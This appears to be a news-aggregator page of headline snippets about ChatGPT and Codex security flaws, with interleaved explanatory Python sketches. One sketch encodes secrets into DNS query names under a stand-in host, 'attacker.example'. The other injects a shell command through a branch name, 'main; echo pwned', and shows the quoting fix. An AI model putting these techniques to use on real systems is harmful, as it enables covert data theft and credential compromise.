ChatGPT and Codex flaws, patched in February 2026, enabled DNS-based data exfiltration and GitHub token theft, raising enterprise AI security concerns.
What happens when researchers think outside the box? Data gets exfiltrated through DNS.
Command injection in Codex and a hidden outbound channel in ChatGPT exposed risks of credential theft and covert data ...
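The headlines above refer to DNS as a covert outbound channel: even when HTTP egress is blocked, secrets can be leaked by encoding them into DNS query names that resolve through an attacker-controlled domain. A minimal sketch of how that encoding works (the domain `attacker.example` and all function names are hypothetical, not taken from the reported ChatGPT flaw):

```python
# Sketch of DNS-based exfiltration encoding. Data is hex-encoded and
# chunked into DNS labels (max 63 bytes each) under a hypothetical
# attacker-controlled domain; each lookup of such a name reaches the
# attacker's authoritative nameserver, which logs the query.
import binascii

ATTACKER_DOMAIN = "attacker.example"  # hypothetical collection domain
MAX_LABEL = 63                        # DNS limit per label (RFC 1035)

def encode_exfil_names(secret: bytes) -> list[str]:
    """Split a secret into DNS query names carrying hex-encoded chunks."""
    hexed = binascii.hexlify(secret).decode()
    chunks = [hexed[i:i + MAX_LABEL] for i in range(0, len(hexed), MAX_LABEL)]
    # Prefix each chunk with a sequence number so order survives transit.
    return [f"{seq}.{chunk}.{ATTACKER_DOMAIN}" for seq, chunk in enumerate(chunks)]

def decode_exfil_names(names: list[str]) -> bytes:
    """What the attacker's nameserver does with the logged query names."""
    parts = sorted((n.split(".") for n in names), key=lambda p: int(p[0]))
    return binascii.unhexlify("".join(p[1] for p in parts))
```

No network traffic is performed here; in a real attack the encoded names would simply be resolved, and the nameserver logs reassemble the secret.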
Hackers can steal your GitHub tokens through OpenAI’s Codex using nothing more than a sneaky branch name ...
Security experts discover critical flaw in OpenAI's Codex that could compromise entire organizations
Researchers managed to steal GitHub OAuth tokens by abusing a command injection vulnerability.
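The vulnerability class described here arises when an untrusted value, such as a Git branch name, is interpolated into a shell command string. A minimal illustration of the pattern and its standard mitigation (the function names and payload are illustrative, not OpenAI's actual code):

```python
# Sketch of command injection via a malicious branch name. If the
# name is spliced verbatim into a shell string, metacharacters like
# ";" let it append extra commands; quoting it as a single shell
# word neutralizes them.
import shlex

PAYLOAD = "main; echo pwned"  # hypothetical malicious branch name

def build_checkout_unsafe(branch: str) -> str:
    # VULNERABLE: the shell would parse "; echo pwned" as a second command.
    return f"git checkout {branch}"

def build_checkout_safe(branch: str) -> str:
    # Mitigation: shlex.quote wraps the name so the shell treats it
    # as one inert argument.
    return f"git checkout {shlex.quote(branch)}"
```

Passing arguments as a list to `subprocess.run` (bypassing the shell entirely) achieves the same protection by construction.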
Cybersecurity researchers have discovered several malicious Google Chrome extensions that hijack Amazon affiliate links, steal data, and collect ChatGPT authentication tokens. In late January, Socket ...
What if you could achieve the same results with a fraction of the effort? OpenAI’s latest release, ChatGPT 5.1, promises to do just that by cutting token usage by up to 80%. Imagine ...